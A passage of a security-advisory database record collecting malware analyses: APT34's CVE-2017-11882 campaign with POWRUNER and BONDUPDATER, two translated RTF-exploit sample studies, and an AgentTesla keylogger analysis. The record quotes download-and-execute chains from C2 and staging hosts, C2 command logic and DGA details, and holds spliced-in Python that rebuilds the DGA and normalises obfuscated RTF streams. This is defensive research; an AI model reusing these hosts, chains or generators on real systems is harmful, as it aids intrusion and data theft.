As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.\n\n#### CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability\n\nCVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.\n\nThe vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that is used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology. It is created as a separate process rather than as a child process of the Office application. If a crafted formula is passed to the Equation Editor, it does not check the data length properly while copying the data, which results in stack memory corruption. Because EQNEDT32.EXE is compiled with an older compiler and does not support address space layout randomization (ASLR), a mitigation that guards against the exploitation of memory corruption vulnerabilities, the attacker can easily alter the flow of program execution.\n\n#### Analysis\n\nAPT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a spear phishing email sent to the victim organization. The malicious file exploits CVE-2017-11882, which corrupts the memory on the stack and then proceeds to push the malicious data to the stack. The malware then overwrites the function address with the address of an existing instruction from EQNEDT32.EXE. 
The instruction at the overwritten address (displayed in Figure 1) is used to call the \u201cWinExec\u201d function from kernel32.dll, as depicted by the instruction at 00430c12.\n\nFigure 1: Disassembly of overwritten function address\n\nAfter exploitation, the \u2018WinExec\u2019 function is successfully called to create a child process, \u201cmshta.exe\u201d, in the context of the currently logged-on user. The process \u201cmshta.exe\u201d downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.\n\nFigure 2: Attacker data copied to corrupt stack buffer\n\n#### Execution Workflow\n\nThe malicious script goes through a series of steps to successfully execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.\n\nFigure 3: CVE-2017-11882 and POWRUNER attack sequence\n\n 1. The malicious .rtf file exploits CVE-2017-11882.\n 2. The malware overwrites the function address with an existing instruction from EQNEDT32.EXE.\n 3. The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp://mumbai-m[.]site/b.txt.\n 4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.\n 5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\\n 6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.\n 7. 
cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.\n 8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.\n 9. cUpdateCheckers.bat and *.base are deleted from the staging directory.\n\nFigure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.\n\n \nFigure 4: Execution Workflow Section of v.vbs\n\nAfter successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. \n\n#### hUpdateCheckers.ps1 (POWRUNER)\n\nThe backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.\n\n \nFigure 5: POWRUNER PowerShell script hUpdateCheckers.ps1\n\nPOWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either \u201cnot_now\u201d or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. 
The command values and the associated actions are described in Table 1.

| Command | Description | Action |
|---|---|---|
| 0 | Server response string contains batch commands | Execute batch commands and send results back to server |
| 1 | Server response string is a file path | Check for file path and upload (PUT) the file to server |
| 2 | Server response string is a file path | Check for file path and download (GET) the file |

Table 1: POWRUNER commands

After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.

The C2 server can also send a PowerShell command to capture and store a screenshot of the victim's system. POWRUNER sends the captured screenshot image file to the C2 server when the "fileupload" command is issued. Figure 6 shows the PowerShell "Get-Screenshot" function sent by the C2 server.

Figure 6: PowerShell Screenshot Functionality

#### dUpdateCheckers.ps1 (BONDUPDATER)

One of APT34's recent advancements is the use of a DGA to generate subdomains. The BONDUPDATER script, named after the hard-coded string "B007", uses a custom DGA to generate subdomains for communication with the C2 server.

#### DGA Implementation

Figure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER's custom DGA.

Figure 7: Breakdown of subdomain created by BONDUPDATER

 1. A randomly generated number created using the following expression: `$rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));` (between one and six two-digit values, concatenated).
 2. A flag that is either 0 or 1. It is initially 0; if the first resolved IP address starts with 24.125.X.X, it is set to 1.
 3. A counter, initially 000, incremented by 3 after every DNS request.
 4. The first 12 characters of the system UUID.
 5. The hard-coded string "B007".
 6. The hard-coded domain "mumbai-m[.]site".

BONDUPDATER attempts to resolve the resulting DGA domain and takes the following actions based on the resolved IP address:

 1. Create a temporary file in the %temp% location.
    * The file name is the last two octets of the resolved IP address.
 2. Evaluate the last character of the file name and perform the corresponding action from Table 2.

| Character | Description |
|---|---|
| 0 | File contains batch commands; execute them |
| 1 | Rename the temporary file with a .ps1 extension |
| 2 | Rename the temporary file with a .vbs extension |

Table 2: BONDUPDATER Actions

Figure 8 is a screenshot of BONDUPDATER's DGA implementation.

Figure 8: Domain Generation Algorithm

Some examples of the generated subdomains observed at the time of execution include:

143610035BAF04425847B007.mumbai-m[.]site
835710065BAF04425847B007.mumbai-m[.]site
376110095BAF04425847B007.mumbai-m[.]site

#### Network Communication

Figure 9 shows example network communications between a POWRUNER backdoor client and server.

Figure 9: Example Network Communication

In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a number ending in '0', POWRUNER sends another random GET request to receive the command string.
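Stepping back to the BONDUPDATER subdomain layout described in the DGA Implementation section: the following added example (not code from the FireEye article, and not the script's own PowerShell) rebuilds a label from its fields, generates the sequence one infected host would query, and parses observed names back into their fields so they can be picked out of DNS logs. The field order is the article's; the three-digit counter width, the log-line format and the sample log lines are assumptions, and the three DGA names in the sample log are the ones the article observed.

```python
"""BONDUPDATER subdomain builder and parser (added example, not the original script)."""
import random
import re
from dataclasses import dataclass
from typing import List, Optional

B007 = "B007"
C2_DOMAIN = "mumbai-m.site"


def random_prefix(rng: random.Random) -> str:
    """Python mirror of $rnd = -join (Get-Random -InputObject (10..99) -Count (1..6 pick)):
    one to six distinct two-digit numbers, concatenated."""
    return "".join(str(v) for v in rng.sample(range(10, 100), rng.randint(1, 6)))


def label(rnd: str, flag: int, counter: int, uuid12: str) -> str:
    """rnd | flag (0/1) | counter (3 digits, assumed width) | UUID[:12] | B007."""
    if flag not in (0, 1) or not 0 <= counter <= 999:
        raise ValueError("flag must be 0/1 and counter must fit in three digits")
    return f"{rnd}{flag}{counter:03d}{uuid12[:12].upper()}{B007}"


def generate(rng: random.Random, uuid12: str, count: int, flag: int = 0) -> List[str]:
    """FQDNs one host would query: the counter starts at 000 and grows by 3 per
    DNS request. The flag only flips when the first answer is in 24.125.x.x,
    which this offline example does not model, so it is passed in."""
    return [f"{label(random_prefix(rng), flag, 3 * i, uuid12)}.{C2_DOMAIN}" for i in range(count)]


def demo_sequence(seed: int = 7, count: int = 3) -> List[str]:
    """Deterministic sample sequence for a constructed host UUID prefix."""
    return generate(random.Random(seed), "5BAF04425847", count, flag=1)


@dataclass
class DgaName:
    rnd: str
    flag: int
    counter: int
    uuid12: str
    domain: str


_RND = re.compile(r"(?:\d{2}){1,6}")
_HEX12 = re.compile(r"[0-9A-F]{12}")


def parse(fqdn: str) -> Optional[DgaName]:
    """Decode a BONDUPDATER name by peeling the fixed-width fields off the end;
    this avoids the ambiguity a left-to-right regex has when the UUID starts with digits."""
    first, _, domain = fqdn.strip(".").partition(".")
    first = first.upper()
    if len(first) < 2 + 1 + 3 + 12 + 4 or not first.endswith(B007):
        return None
    body = first[:-4]
    uuid12, body = body[-12:], body[:-12]
    counter, body = body[-3:], body[:-3]
    flag, rnd = body[-1], body[:-1]
    if not (_HEX12.fullmatch(uuid12) and counter.isdigit()
            and flag in ("0", "1") and _RND.fullmatch(rnd)):
        return None
    return DgaName(rnd, int(flag), int(counter), uuid12, domain)


def scan_dns_log(lines: List[str]) -> List[DgaName]:
    """Pick BONDUPDATER queries out of 'timestamp client qname' log lines (assumed format)."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) >= 3:
            hit = parse(fields[2])
            if hit is not None:
                hits.append(hit)
    return hits


# Constructed log lines; the three DGA names are the ones the article observed.
SAMPLE_DNS_LOG = [
    "2017-12-01T10:00:00Z 10.0.0.5 www.example.com",
    "2017-12-01T10:00:01Z 10.0.0.5 143610035BAF04425847B007.mumbai-m.site",
    "2017-12-01T10:00:02Z 10.0.0.5 835710065BAF04425847B007.mumbai-m.site",
    "2017-12-01T10:00:03Z 10.0.0.5 376110095BAF04425847B007.mumbai-m.site",
]

if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_DNS_LOG):
        print(hit)
```

Because the UUID prefix and the B007 marker are constant per host while only the random prefix and counter move, grouping hits by `uuid12` and checking that `counter` advances in steps of 3 is a stronger detection than matching the domain alone, and it survives a change of C2 domain.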
The C2 server then sends back a Base64-encoded response.

If the server had instead sent the string "not_now" as the response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated.

Figure 10: Example "not now" server response

#### Batch Commands

POWRUNER may also receive batch commands from the C2 server to collect host information. This may include information about the currently logged-in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.

Figure 11: Batch commands sent by POWRUNER C2 server

#### Additional Use of POWRUNER / BONDUPDATER

APT34 has used POWRUNER and BONDUPDATER to target Middle East organizations since at least July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8) that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from:

hxxp://94.23.172.164/dupdatechecker.doc

As shown in Figure 12, the script within the dupdatechecker.doc file attempts to download another file named dupdatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be a taunt aimed at security researchers.

Figure 12: Contents of dupdatechecker.doc script

The dupdatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.

#### Outlook and Implications

Recent activity by APT34 demonstrates that they are a capable group with potential access to their own development resources.
During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly known vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to target organizations in the Middle East. We assess that APT34's efforts to continuously update their malware, including the incorporation of a DGA for C2, demonstrate the group's commitment to pursuing strategies to deter detection. We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.

#### IOCs

| Filename / Domain / IP Address | MD5 Hash or Description |
|---|---|
| CVE-2017-11882 exploit document | A0E6933F4E0497269620F44A083B2ED4 |
| b.txt | 9267D057C065EA7448ACA1511C6F29C7 |
| v.txt/v.vbs | B2D13A336A3EB7BD27612BE7D4E334DF |
| dUpdateCheckers.base | 4A7290A279E6F2329EDD0615178A11FF |
| hUpdateCheckers.base | 841CE6475F271F86D0B5188E4F8BC6DB |
| cUpdateCheckers.bat | 52CA9A7424B3CC34099AD218623A0979 |
| dUpdateCheckers.ps1 | BBDE33F5709CB1452AB941C08ACC775E |
| hUpdateCheckers.ps1 | 247B2A9FCBA6E9EC29ED818948939702 |
| GoogleUpdateschecker.vbs | C87B0B711F60132235D7440ADD0360B0 |
| hxxp://mumbai-m[.]site | POWRUNER C2 |
| hxxp://dns-update[.]club | Malware Staging Server |
| CVE-2017-0199 exploit document | 63D66D99E46FB93676A4F475A65566D8 |
| 94.23.172.164:80 | Malware Staging Server |
| dupdatechecker.doc | D85818E82A6E64CA185EDFDDBA2D1B76 |
| dupdatechecker.exe | C9F16F0BE8C77F0170B9B6CE876ED7FB |
| proxycheker[.]pro | C2 |
| 46.105.221.247 | Has resolved mumbai-m[.]site & hpserver[.]online |
| 148.251.55.110 | Has resolved mumbai-m[.]site and dns-update[.]club |
| 185.15.247.147 | Has resolved dns-update[.]club |
| 145.239.33.100 | Has resolved dns-update[.]club |
| 82.102.14.219 | Has resolved ns2.dns-update[.]club & hpserver[.]online & anyportals[.]com |
| v7-hpserver.online.hta | E6AC6F18256C4DDE5BF06A9191562F82 |
| dUpdateCheckers.base | 3C63BFF9EC0A340E0727E5683466F435 |
| hUpdateCheckers.base | EEB0FF0D8841C2EBE643FE328B6D9EF5 |
| cUpdateCheckers.bat | FB464C365B94B03826E67EABE4BF9165 |
| dUpdateCheckers.ps1 | 635ED85BFCAAB7208A8B5C730D3D0A8C |
| hUpdateCheckers.ps1 | 13B338C47C52DE3ED0B68E1CB7876AD2 |
| googleupdateschecker.vbs | DBFEA6154D4F9D7209C1875B2D5D70D5 |
| hpserver[.]online | C2 |
| v7-anyportals.hta | EAF3448808481FB1FDBB675BC5EA24DE |
| dUpdateCheckers.base | 42449DD79EA7D2B5B6482B6F0D493498 |
| hUpdateCheckers.base | A3FCB4D23C3153DD42AC124B112F1BAE |
| dUpdateCheckers.ps1 | EE1C482C41738AAA5964730DCBAB5DFF |
| hUpdateCheckers.ps1 | E516C3A3247AF2F2323291A670086A8F |
| anyportals[.]com | C2 |
", "modified": "2017-12-07T12:00:00", "published": "2017-12-07T12:00:00", "id": "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "href": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", "type": "fireeye", "title": "New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2018-12-25T17:29:45", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "![](/Article/UploadPic/2018-12/20181225205545726.png)
We recently intercepted a Word attack sample with a .doc extension whose actual format is RTF. Analysis of the document's composition shows that it exploits CVE-2017-11882 and CVE-2018-0802, uses an embedded Excel object to trigger the vulnerability, and drops a PE file that collects the target user's sensitive information.

I. Basic behaviour
In the test environment (Windows 7 x64, Office 2010), opening the document and monitoring processes shows that the winword process first executes excel.exe, which then runs EQNEDT32.exe, which in turn runs cmd.exe, which finally runs a process named A.X; EQNEDT32.exe runs twice. The appearance of EQNEDT32.exe suggests a CVE-2017-11882 or CVE-2018-0802 sample.
When opened, the document displays as an empty page, as shown below.
![](/Article/UploadPic/2018-12/20181225205545737.png)
At a glance it looks blank, but a closer look reveals a small black dot icon in the top left corner, as shown below.
![](/Article/UploadPic/2018-12/20181225205545312.png)
Double-clicking it opens the pop-up window shown below, which reads "Windows cannot open this file: A.X". The "small black dot" is evidently an external object.
![](/Article/UploadPic/2018-12/20181225205545780.png)
Right-clicking the object and selecting "Packager Shell Object" lets us view the object's "Properties", as shown below.
![](/Article/UploadPic/2018-12/20181225205545220.png)
Its object properties are shown below:
![](/Article/UploadPic/2018-12/20181225205545229.png)
From this we can conclude that the sample embeds a PE object in the RTF, which is written to the %temp% directory by default when the document is opened, and then uses CVE-2017-11882 or CVE-2018-0802 to execute it.

II. RTF analysis
1. Document structure
![](/Article/UploadPic/2018-12/20181225205545186.png)
Analysing the document with rtfobj shows two embedded objects: a Package object and an Excel.Sheet.8 object, as shown in the figure.
The Package object's original path is "C:\Users\n3o\AppData\Local\Microsoft\Windows\INetCache\Content.Word\A.X", from which we can see that the document author's operating-system user name is n3o. A.X is the malicious PE file that gets dropped.
The other object is an embedded Excel worksheet. Extracting it, renaming it with an .xls suffix and opening it in Excel shows two objects, AAAA and bbbb, both "Equation.3" objects, as shown below.
![](/Article/UploadPic/2018-12/20181225205545928.png)
The structure of the extracted Excel object is shown below.
![](/Article/UploadPic/2018-12/20181225205545742.png)
The worksheet contains two Microsoft Equation 3.0 objects, MBD0002E630 and MBD0002E631, with CLSID "0002ce02-0000-0000-c000-000000000046"; their modification time is 2018/5/21 17:52.
![](/Article/UploadPic/2018-12/20181225205545793.png)
The Ole10Native streams of the two "Microsoft Equation 3.0" objects are 59 bytes and 160 bytes in size and contain "cmd.exe /c %tmp%\A.X", which is used to run the A.X process. They should be the CVE-2017-11882 and CVE-2018-0802 exploits, used in combination.
We can now sketch the sample's overall flow, shown in the following diagram.
![](/Article/UploadPic/2018-12/20181225205545654.png)
2. Static analysis of the document
Opening the file in WinHex, the first Package object is found at file offset 0x2A8A. The value 0x00137158 there is the size of the object, 1,274,200 in decimal, which is the size of the dropped A.X.
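The hex stream that follows that size field is where this sample hides its headers: the article goes on to describe the PE signature 4d5a split by inserted 0x090d bytes and the compound-document signature d0cf11 split by 0x0909. The following Python is an added example, not code from the article or from rtfobj, of a helper that reads an RTF object's hex text the tolerant way Word does (skipping control bytes and whitespace between hex digits) so that signature checks and the size comparison the article performs are done on the normalised bytes. The byte strings below are constructed to match the article's description; the real sample is not reproduced, and the 4-byte little-endian size field is interpreted the way the article interprets the value at that offset (0x00137158 = 1,274,200 bytes).

```python
"""Normalise obfuscated RTF object hex streams before signature checks (added example)."""
import re
from typing import Dict, List, Optional, Tuple

# Bytes an RTF reader skips inside hex data: CR, LF, TAB, space and the other
# C0 control bytes. A scanner that greps the raw file for 4d5a or d0cf11e0
# never sees the signature once these are sprinkled between the hex digits.
_SKIP = re.compile(rb"[\x00-\x20]+")
_HEXRUN = re.compile(rb"[0-9A-Fa-f]*")

SIGNATURES: Dict[bytes, str] = {
    b"MZ": "PE executable",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "OLE compound document",
}


def normalise_hex_stream(raw: bytes) -> bytes:
    """Drop the ignorable bytes and decode the remaining hex digits."""
    cleaned = _SKIP.sub(b"", raw)
    if not cleaned or len(cleaned) % 2 or not _HEXRUN.fullmatch(cleaned):
        raise ValueError("not a pure hex stream after removing control bytes")
    return bytes.fromhex(cleaned.decode("ascii"))


def is_valid_hex_stream(raw: bytes) -> bool:
    try:
        normalise_hex_stream(raw)
        return True
    except ValueError:
        return False


def identify(blob: bytes) -> Optional[str]:
    """Name the embedded file type from its leading magic bytes, if known."""
    for magic, name in SIGNATURES.items():
        if blob.startswith(magic):
            return name
    return None


def size_prefixed_payload(blob: bytes) -> Tuple[int, bytes]:
    """Split '<uint32 little-endian size><file bytes>' as found in front of the
    dropped A.X; the declared size doubles as a check on the extracted file."""
    if len(blob) < 4:
        raise ValueError("too short for a size field")
    size = int.from_bytes(blob[:4], "little")
    return size, blob[4:4 + size]


def find_signatures(blob: bytes) -> List[Tuple[int, str]]:
    """Offsets of every known magic in the normalised data."""
    hits = []
    for magic, name in SIGNATURES.items():
        start = 0
        while True:
            pos = blob.find(magic, start)
            if pos == -1:
                break
            hits.append((pos, name))
            start = pos + 1
    return sorted(hits)


def constructed_package_stream() -> bytes:
    """Constructed stand-in for the Package object's hex text: the size field
    0x00137158 ('58711300' little-endian) then an MZ header whose digits are
    separated by 0x09 0x0D, as the article describes ([0x090d]4[0x090d]d...)."""
    split_mz = b"\x09\x0d".join([b"", b"4", b"d", b"5", b"a", b""])
    return b"58711300" + split_mz + b"9000" + b"03000000"


def constructed_excel_stream() -> bytes:
    """Constructed stand-in for the Excel.Sheet.8 object: the D0CF11E0A1B11AE1
    header with 0x09 0x09 between every hex digit (d[0x0909]0[0x0909]...)."""
    return b"\x09\x09".join(bytes([c]) for c in b"d0cf11e0a1b11ae1") + b"\x09\x09" + b"0000"


def analyse(raw: bytes) -> Dict[str, object]:
    """Normalise one object's hex text and report what it really contains."""
    blob = normalise_hex_stream(raw)
    kind = identify(blob)
    declared, payload = None, blob
    if kind is None:  # a size field may precede the file, as in the Package object
        declared, payload = size_prefixed_payload(blob)
        kind = identify(payload)
    return {
        "kind": kind,
        "declared_size": declared,
        "payload_complete": declared is None or len(payload) == declared,
        "signatures": find_signatures(blob),
    }


if __name__ == "__main__":
    print(analyse(constructed_package_stream()))
    print(analyse(constructed_excel_stream()))
```

The same normalisation is what rtfobj effectively performs when it extracts the objects, which is why the tool recovered both objects and their sizes intact even though a raw signature scan of the file would have missed them.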
The PE file follows this size field. In WinHex we can see that the author has modified the PE header: the bytes 0x4D5A are split by inserting 0x090D between the hex digits, so that the stream reads [0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d], which is still 0x4d5a once the inserted bytes are ignored. This is presumably meant to evade certain antivirus engines: the hex stream no longer shows the recognisable 0x4d5a9000 that immediately marks a PE file. Specifically, as shown below:
![](/Article/UploadPic/2018-12/20181225205545840.png)
The other object, at offset 0x299061, is an Excel.Sheet.8 object. Its size is 0x00005C00, 23,552 in decimal, consistent with the size of the Excel object extracted by rtfobj. The author has also altered the compound document header, splitting it with 0x0909 so that the D0CF11 signature at the start of the compound document becomes d[0x0909]0[0x0909]... This too should be a form of AV evasion.

[1] [2](92510_2.htm) [3](92510_3.htm) [next](92510_2.htm)
", "edition": 1, "modified": "2018-12-25T00:00:00", "published": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-02T18:49:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "We recently obtained a Word document with a .doc suffix that turned out to be a Rich Text Format document. Opening it in a test environment produced a network connection and the execution of a program, so the sample was judged to be a malicious document. Preliminary analysis showed it to be a new exploit sample for CVE-2017-11882.
CVE-2017-11882 and CVE-2018-0802 are both vulnerabilities in the processing logic of the Office Equation Editor and are currently the usual means used by malicious Office attack documents. Analyses of the root cause and exploitation of these vulnerabilities are already available online, for example 360 Tianyan Lab's analysis of the latest AV-evasion technique for CVE-2017-11882 that abuses the Equation Editor's special processing logic, and Tencent PC Manager's analysis of samples that combine the n-day vulnerability CVE-2017-11882 with the 0-day vulnerability CVE-2018-0802 to spread remote control trojans. This sample differs slightly from those analysed before and should be a variant of the CVE-2017-11882 exploit.

I. Basic behaviour
Test environment: Windows 7 x64 SP1 Chinese edition, Office 2010 Chinese edition.
After the sample is opened, the document content displays as garbage, as shown below.
![](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png!small)
In addition, an executable named emre.exe is created and run in the %temp% directory. Packet capture shows that emre.exe is downloaded from http://ghthf.cf/cert/ochicha.exe, as shown below.
![](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png!small)

II. Debugging the vulnerability
1. Form of the sample
Opened in WinHex, the file looks like the two figures below. The displayed content directly follows the document header.
![](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png!small)
It is followed by the object, as shown below.
![](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png!small)
2. Preliminary RTF analysis
The result of analysing the file with rtfobj is shown below. The CLSID 0002ce02-0000-0000-c000-000000000046 identifies the
Microsoft Equation Editor object.
![](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png!small)
![](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png!small)
From the figure we can see that the object name is "eQuatiON native": the normal object name "Equation Native" has had its case altered, probably as another AV-evasion measure.
3. Debugging the vulnerability
Following the various published analyses, we go straight to the vulnerable function at 0041160F.
![](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png!small)
After the 11th rep operation, the return address on the stack has been overwritten with 0x0043F775, as shown in the figures below.
![](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png!small)
![](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png!small)
In the EQNEDT32.EXE process the byte at 0x0043F775 is C3, which happens to be a retn instruction.
![](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png!small)
After it executes, control jumps to the shellcode location, as shown below:
![](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png!small)
4. Debugging and analysing the shellcode
The shellcode lives in the eQuatiON native object and is divided into two parts. The first starts at offset 0x0826 (the B9 C439E66A shown in the figure above, whose disassembly starts at 0018F354) and runs to 0x0851, followed by the four bytes 0x0043F7F5 (the RETN instruction in the EQNEDT32.EXE process). The second part starts at 0x089E and runs to the end.
![](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png!small)
The assembly with which the first part of the shellcode jumps to the second part is shown below:
![](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png!small)
Analysis shows that this segment of shellcode performs a series of jmp instructions, because the shellcode has been obfuscated and protected. For example, as the following figure shows:
![](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png!small)

[1] [2](92253_2.htm) [next](92253_2.htm)
", "edition": 1, "modified": "2018-12-02T00:00:00", "published": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-28T03:24:00", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Background
AgentTesla was originally a simple keylogger released in 2014; in recent years its development team has kept adding new features and sells it. AgentTesla has now become commercial spyware whose control panel generates trojans tailored to the buyer's functional requirements.
AgentTesla's most common distribution method is phishing email, with attachments carrying a malicious document that downloads and runs a malicious program through a macro or an exploit. Recently the Sangfor security team collected malicious samples that use CVE-2017-11882 to spread the AgentTesla information stealer and analysed the attack process in detail.

Detailed analysis
CVE-2017-11882
1. Monitoring file behaviour with tools shows that after the document is opened the system starts the eqnedt32.exe process, and packet capture shows the download of an EXE file, from which we determine that CVE-2017-11882 is used to execute malicious code:
![](/Article/UploadPic/2019-5/201952872350787.png)
2. Attaching a debugger and setting a breakpoint on Kernel32!WinExec, the register values show the command "C:\Users\root\AppData\Roaming\Adobe.exe" being run. Combined with the captured traffic, the malicious code evidently downloads the file to disk and then runs it, so we infer that it uses the URLDownloadToFile family of APIs:
![](/Article/UploadPic/2019-5/201952872351853.png)
3. Breakpoints set on the network-related APIs in the attached debugger were never hit, so a breakpoint was placed on the function in eqnedt32.exe that causes the overflow and execution was single-stepped to the ret, where the overwritten return address transfers control to the malicious code:
![](/Article/UploadPic/2019-5/201952872353745.png)
4. The malicious code first decrypts itself in memory; the figures show a before-and-after comparison of the decryption. The string contents make it clear that it dynamically resolves API addresses to call URLDownloadToFileW to download the file and then WinExec to run it:
![](/Article/UploadPic/2019-5/201952872354449.png)
![](/Article/UploadPic/2019-5/201952872356708.png)

AgentTesla
1. AgentTesla is a keylogger written in .NET. Viewing the code with a decompiler, the custom function names are obfuscated, but the APIs used and the keyword strings are still in plain text, and the keystroke-recording code can be seen:
![](/Article/UploadPic/2019-5/201952872358476.png)
2. In addition to keylogging, it reads registry key values to obtain host information:
![](/Article/UploadPic/2019-5/201952872359416.png)
3. It uses the DES algorithm to encrypt the data to be sent:
![](/Article/UploadPic/2019-5/20195287240111.png)
4. There are three alternative ways of uploading the stolen data to the remote C&C:
Via FTP:
![](/Article/UploadPic/2019-5/20195287241828.png)
Via SMTP:
![](/Article/UploadPic/2019-5/20195287242974.png)
Via HTTP:
![](/Article/UploadPic/2019-5/20195287243766.png)
5. AgentTesla embeds in its resources a DLL named IELibrary.dll that implements browser operations. AgentTesla defines the names of the browsers and network tools whose information is to be stolen; this is selectable when the malicious program is generated from the control panel:
![](/Article/UploadPic/2019-5/20195287244718.png)
6. IELibrary.dll mainly collects and manipulates browser information, including adding, deleting, querying and modifying the history:
![](/Article/UploadPic/2019-5/20195287244281.png)
and stealing passwords and cookies:
![](/Article/UploadPic/2019-5/20195287245577.png)

Solutions
Virus defence
1. Do not download software from unknown websites, do not open email attachments from unknown sources, and do not enable macros casually;
2. Download and install the patch for CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
3. Enable Windows Update so that the system is updated automatically on a regular basis;
4. Sangfor firewall customers are advised to upgrade to version AF805 and enable the SAVE artificial-intelligence engine for the best defensive results;
Finally, enterprises are advised to carry out a security check and antivirus scan across the whole network to strengthen their protection.
